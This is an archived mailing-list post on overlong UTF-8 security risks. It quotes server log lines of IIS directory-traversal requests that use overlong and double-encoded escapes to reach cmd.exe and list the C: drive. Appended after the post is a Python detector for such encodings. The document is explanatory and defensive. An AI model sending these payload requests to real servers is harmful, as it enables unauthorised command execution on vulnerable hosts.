Security
For those of you still wondering what I was worried about a few years
ago with regard to overlong UTF-8 sequences, here are some extracts from our
httpd log files:
...
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
...
Looks familiar? :)
Markus
P.S.: Has anyone an idea which IIS worm performs the above
HTTP vulnerability tests? Is it one of the later Nimda variants
or something else?
--
Markus G. Kuhn, Computer Laboratory, University of Cambridge, UK
Email: mkuhn at acm.org, WWW: <http://www.cl.cam.ac.uk/~mgk25/>
--
Linux-UTF8: i18n of Linux on all levels
Archive: http://mail.nl.linux.org/linux-utf8/
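
The log extract in the message above mixes two encoding tricks: overlong UTF-8 sequences and repeated percent-encoding. As an added example (not part of the original message), the following Python code flags both in a request target; the function names and finding labels are assumptions, and the sample lines are copied from the extract plus one constructed benign request.

```python
import re

ESCAPE = re.compile(rb"%([0-9A-Fa-f]{2})")
# Smallest code point that genuinely needs an n-byte sequence (original 1-6 byte UTF-8).
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}

def utf8_findings(data):
    """Walk the bytes as UTF-8 and flag overlong or malformed sequences."""
    found, i = set(), 0
    while i < len(data):
        b = data[i]
        i += 1
        if b < 0x80:
            continue
        n = 8 - (b ^ 0xFF).bit_length()      # leading 1 bits = claimed sequence length
        tail = data[i:i + n - 1]
        if n == 1 or n > 6 or len(tail) < n - 1 or any(c & 0xC0 != 0x80 for c in tail):
            found.add("invalid-utf8")        # stray continuation, bad lead or truncated
            continue
        cp = b & (0x7F >> n)
        for c in tail:
            cp = (cp << 6) | (c & 0x3F)
        i += n - 1
        if cp < MIN_CP[n]:
            found.add("overlong-utf8")       # a shorter encoding exists for this code point
    return found

def classify(target):
    """Return the set of encoding anomalies found in one request target."""
    raw = target.encode("latin-1")
    once = ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)  # one decode pass
    found = utf8_findings(once)
    if ESCAPE.search(once):
        found.add("double-encoding")         # a second decode pass would change the path
    if re.search(rb"%(?![0-9A-Fa-f]{2})", raw):
        found.add("malformed-escape")        # '%' not followed by two hex digits
    return found

# Request lines taken from the log extract above, plus one constructed benign line.
SAMPLE = [
    r"GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0",
    r"GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0",
    r"GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0",
    "GET /docs/caf%C3%A9.html HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(sorted(classify(line.split()[1])) or "clean", line)
```

A decoder that rejects every sequence this check flags, and that canonicalises a path exactly once before any access decision, treats all of the logged variants as errors rather than as path separators.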